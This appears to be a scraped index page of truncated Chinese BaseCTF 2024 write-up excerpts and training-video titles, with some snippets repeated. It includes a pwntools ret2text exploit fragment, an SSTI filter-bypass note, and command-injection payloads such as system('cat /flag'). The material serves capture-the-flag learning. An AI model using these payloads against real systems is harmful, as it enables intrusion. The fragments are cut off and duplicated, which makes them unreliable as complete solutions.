2024ba 1、复读机 这题页面是一个 之后在网络中可以看到这个网页的处理器是python 而且flag中还有类似于{}这样的字眼,而且还是python处理的,所以就想到了ssti 果然,出现了waf,所以基本上就是这个思路 + - * / . {{ }} __ : " \这些好像都被过滤了,还有一些关键字也被过滤了,可以在关键字中间插入一对单...
BaseCTF2024 pwn [Week1] Ret2text exp from pwn import * context(os='linux',arch = 'amd64',log_level = 'debug') io = remote("challenge.basectf.fun",32537) #io = process("./Ret2text") ret_addr = 0x04011A3 payload = (0x20+0x8) * b'a' + p64(ret_addr) + p64(0x4011A4...
176 0 04:58 App BaseCTF2024Crypto-babypack-背包密码 92 0 06:40 App BaseCTF2024Crypto-random_primes 4395 2 08:11 App 15-网络安全CTF系列培训教程之Misc杂项篇-图片隐写术 576 0 06:27 App 25-网络安全CTF系列培训教程之Crypto密码学篇-RSA加密 606 0 03:06 App 御网杯2024-misc篇之word隐写-信...
[BaseCTF2024]sudopacman个人Writeup(包含部分Crypto与Pwn) - 个人主页 (cryingn.github.io) ez_math 该题主要考察对代数中行列式的掌握. 题目 task import numpy as np from Crypto.Util.number import * a, b, c, d = [getPrime(128) for _ in range(4)] point1 = a * d point2 = b * c m...
[BaseCTF2024]sudopacman个人Writeup(包含部分Crypto与Pwn) - 个人主页 (cryingn.github.io) Week2(Crypto) mid_math2 题目 import numpy as np from Crypto.Util.number import * a, b, c = [getPrime(128) for _ in range(3)] d, e, f, h, i, j = [getPrime(1024) for _ in range(6)]...
2024BaseCTF-反方向的雪 给了一张图片 还是章若楠 先去010 看到反的压缩包 先把图片的部分去掉 工具先导出16进制 赛博厨子梭了 导出来 密码位6位 爆破一下 123456 平台提示看雪,是snow隐写 给出了密钥 The_key_is_n0secr3t BaseCTF{Y0u_g0t_1t!}...
116 0 03:15 App BaseCTF2024Crypto-exgcd-共模攻击e不互素 342 0 04:54 App BaseCTF2024Web-命令执行-空格绕过 775 0 04:25 App 17-网络安全CTF系列培训教程之Misc杂项篇-隐写术之excel隐写 495 0 03:42 App 24-网络安全CTF系列培训教程之Crypto密码学篇-栅栏密码 ...
2024BaseCTF-week1wp web HTTP 是什么呀 根据提示写出相应的数据 跳转了网页,但没有flag,BP抓哥包 出现了base64的编码 解码 喵喵喵´•ﻌ•` 命令执行 ?DT=system('ls /'); 看到有flag 直接读取flag ?DT=system('cat /flag'); BaseCTF{8eb2a1c2-7de7-437b-bc16-fc3d783b797c}...
BaseCTF2024 pwn [Week1] Ret2text exp from pwn import * context(os='linux',arch = 'amd64',log_level = 'debug') io = remote("challenge.basectf.fun",32537) #io = process("./Ret2text") ret_addr = 0x04011A3 payload = (0x20+0x8) * b'a' + p64(ret_addr) + p64(0x4011A4...
2024BaseCTF-week1wp web HTTP 是什么呀 根据提示写出相应的数据 跳转了网页,但没有flag,BP抓哥包 出现了base64的编码 解码 喵喵喵´•ﻌ•` 命令执行 ?DT=system('ls /'); 看到有flag 直接读取flag ?DT=system('cat /flag'); BaseCTF{8eb2a1c2-7de7-437b-bc16-fc3d783b797c}...